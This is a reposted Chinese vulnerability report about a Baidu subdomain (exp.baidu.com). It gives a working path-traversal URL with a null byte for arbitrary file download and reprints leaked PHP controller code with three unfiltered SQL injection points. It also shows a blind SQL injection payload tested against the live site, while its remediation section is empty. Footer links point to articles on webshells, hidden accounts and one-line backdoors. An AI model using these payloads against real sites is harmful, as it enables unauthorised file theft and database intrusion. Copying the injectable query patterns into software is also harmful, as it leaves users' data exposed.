当前位置：移动技术网 > 网络运营>安全>网站安全 > 百度分站任意文件下载多处SQL注入漏洞

百度分站任意文件下载多处SQL注入漏洞

2018年03月25日 | 移动技术网网络运营 | 我要评论

百度分站任意文件下载，三处SQL注入漏洞打包

今天无意间翻到一个网站：http://exp.baidu.com/?r=site/home

仔细一看怎么那么像之前提交的漏洞http://wooyun.org/bugs/wooyun-2016-0198361

中的网站http://tiyan.baidu.com

QQ截图20160519220308.jpg

试下之前的任意文件下载漏洞还是存在！

http://exp.baidu.com/static/img.php?s=16,40&n=....//....//index.php%00.png

QQ截图20160519221052.jpg

原来只是换了个域名而已，还是原来的系统一模一样。

通过下载文件信息发现了其中的多处SQL注入

注入一混脸熟提交页面，判断用户名是否存在时未作任何处理。导致SQL注入

UserController.php

/**
     * 混脸熟 - 提交
     */
    public function actionProfileBaseSubmit() {
        // 1.1 基础判断
        if(!User::isValidProfileToken($_POST['profile_token'])) {
            Yii::app()->user->setFlash('profile_base', '凭证失效，请刷新页面重试');
            $this->redirect($this->createUrl('user/profile', array('page' => 'index')));
        }

        if(!$this->user) {
            $this->redirect($this->createUrl('site/home'));
        }

        // 2.1 获取参数 - 保存
        if(!StringUtils::isEmailFormat($_POST['User']['email'])) {
            Yii::app()->user->setFlash('profile_base', '邮箱格式不符合，请检查修改之后再保存');
            $this->redirect($this->createUrl('user/profile', array('page' => 'index')));
        }

        if($this->user->isExistUsername($_POST['User']['username'])) {
            Yii::app()->user->setFlash('profile_base', '该昵称已被抢先注册，请换另外一个吧');
            $this->redirect($this->createUrl('user/profile', array('page' => 'index')));
        }

        $_POST['User']['note'] = strip_tags($_POST['User']['note']);

        // 3.1 添加勋章记录 user_info_step 用一个数组[1, 2, 3, 4, 5]
        $this->user->updateMedalProcessUserInfoStep(User::USER_INFO_STEP_BASE);

        #   已经验证的手机号不允许修改
        if( (int)$this->user->mobile_authenticated == 2 ){
             $_POST['User']['mobile']= $this->user->mobile;
        }

        $this->user->attributes = $_POST['User'];
        if(!$this->user->save(false)) {
            Yii::app()->user->setFlash('profile_base', '操作失败，请稍后尝试');
            $this->redirect($this->createUrl('user/profile', array('page' => 'index')));
        }

        // 4.1 更新用户个人资料完成进度
        $this->user->updateUserCompletion($this->user);

models/user.php

/**
     * 判断是否存在该用户名
     * @param $username
     * @return bool
     */
    public function isExistUsername($username) {
        $count = $this->count("username = '{$username}' AND id != {$this->id}");

        return $count > 0 ? true : false;
    }

注入二添加用户标签 tag_ids 参数未作过滤导致注入

/**
     * 用户标签 - 添加 - 标签
     */
    public function actionProfileSaveTag() {
        // 1.1 更新用户资料完成进度
        $this->user->updateUserCompletion($this->user);
        $this->user->updateMedalProcessUserInfoStep(User::USER_INFO_STEP_TAGS);
        $tagIds = trim($_POST['tag_ids']);

        $arrTagIds = array_filter(explode(',', $tagIds));
        $strTagIds = implode(',', $arrTagIds);

        // 2.1
        $this->user->tag_ids = $strTagIds;
        if(!$this->user->save()) {
            Yii::app()->user->setFlash('profile_tag', '保存标签失败');
        }

        // 3.1 更新用户个人资料完成进度
        $this->user->updateUserCompletion($this->user);

        $this->redirect($this->createUrl('user/profile', array('page' => 'tag')));
    }

PlazaController.php页面的option 参数没有过滤存在SQL注入

public function actionVoteSubmit() {

        $voteId = intval($_POST['vote_id']);

        $options = $_POST['option'];

        if(!$options || count($options) == 0) {

            $this->redirect($this->createUrl('plaza/viewVote', array('id' => $voteId)));

        }



        $vote  = ActVote::model()->findByPk($voteId);



        // 0.0 判断该用户是否参加过在投票

        $hasVoted = ActVoteRecord::model()->hasVoted($this->user->id, $voteId);

        if($hasVoted) {

            $this->redirect($this->createUrl('plaza/viewVote', array('id' => $voteId)));

        }



        // 0.1 判断是否为多选并且该投票有限制多选的最多数量，如果超过，则截取前$vote->limit_num个

        if($vote->type == ActVote::TYPE_MULTI && $vote->limit_num > 0) {

            if(count($options) > $vote->limit_num) {

                $options = array_slice($options, 0, $vote->limit_num);

            }

        }



        // 1.1 选项选中数(selected_num) +1 & 投票的participate_num + 1

        $strOptionIds = implode(',', $options);

        $voteItem = new ActVoteItem();

        $voteItem->updateCounters(array(

            'selected_num' => 1

        ), "id in ({$strOptionIds})");

我这就测试下第一个注入

QQ截图20160519222450.jpg

admin' and LENGTH(USER()) < 25 and 1='1 用户名存在

QQ截图20160519222559.jpg

admin' and LENGTH(USER()) < 24 and 1='1 提交成功

LENGTH(USER()) == 24

解决方案：

修复

您可能感兴趣的文章:

如对本文有疑问，点击进行留言回复！！

推荐:对FCBLOG的简单分析

一：古老的OR注入漏洞。看一下首页，做的好凑合。有个登陆的地方，如图1. 二话不说，试’or’=’or’, 点击登陆。没想... [阅读全文]
论坛通用入侵一条龙教学(图)

目前网上有种新的趋势，黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所，而许多用户的论坛密码竟然与E-mail和QQ的密码完全相同，因此对大家的网... [阅读全文]
热门技术探讨之跨站式入侵(图)

最近朋友们老是弄些跨站,一会看这个站被跨站那个站又被跨站,我看也无聊顺便弄一些玩玩,到百度上随便搜索了几个站的地址结果一测试全都可以弄,这不得不让... [阅读全文]
追踪入侵JSP网站服务器

在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言，安全性真的能够让人放心吗？面对层出不穷的黑客攻击和病毒袭击，JSP网站的服务器能够比其他网站的服务... [阅读全文]
webshell下执行CMD的小技巧分享

webshell下执行CMD的小技巧分享，需要的朋友可以参考下。... 11-03-31 [阅读全文]
微软全系统建立隐藏账户漏洞分析

命令行下能很好的隐藏，但图形界面下虽然显示为空白，但细心的管理员还是能发现。只为交流学习，不建议搞破坏。... 11-11-11 [阅读全文]
什么是CC攻击，如何防止网站被CC攻击的方法总汇

CC攻击（Challenge Collapsar）是DDOS（分布式拒绝服务）的一种，也是一种常见的网站攻击方法，攻击者通过代理服务器或者肉鸡向向受害主机不停地... [阅读全文]
浅说双引号被过滤时一句话的插入与防范

昨日小刀刀在群里抛了一个问题，说后台插入一句话老是出错，群里的朋友出了很多主意，但是最后还是没搞定。后来这小子把问题抛给了我，昨天我就测试了一下。这里把情况介绍... [阅读全文]
dedecms官方模板包含一句话后门木马

应该是前几天出的那个dedecms的0day.官方的网站被日，然后被在风格模板里面值入了一句话木马。XXOO。... 11-09-29 [阅读全文]
利用ntfs流隐藏你的一句话木马的方法

利用ntfs流隐藏你的一句话木马的方法，好邪恶啊，大家一定要注意防范啊。建议服务器安全设置弄好。... 11-09-29 [阅读全文]

网友评论


验证码：

百度分站任意文件下载多处SQL注入漏洞

2018年03月25日 | 移动技术网网络运营 | 我要评论

解决方案：

您可能感兴趣的文章:

相关文章:

网友评论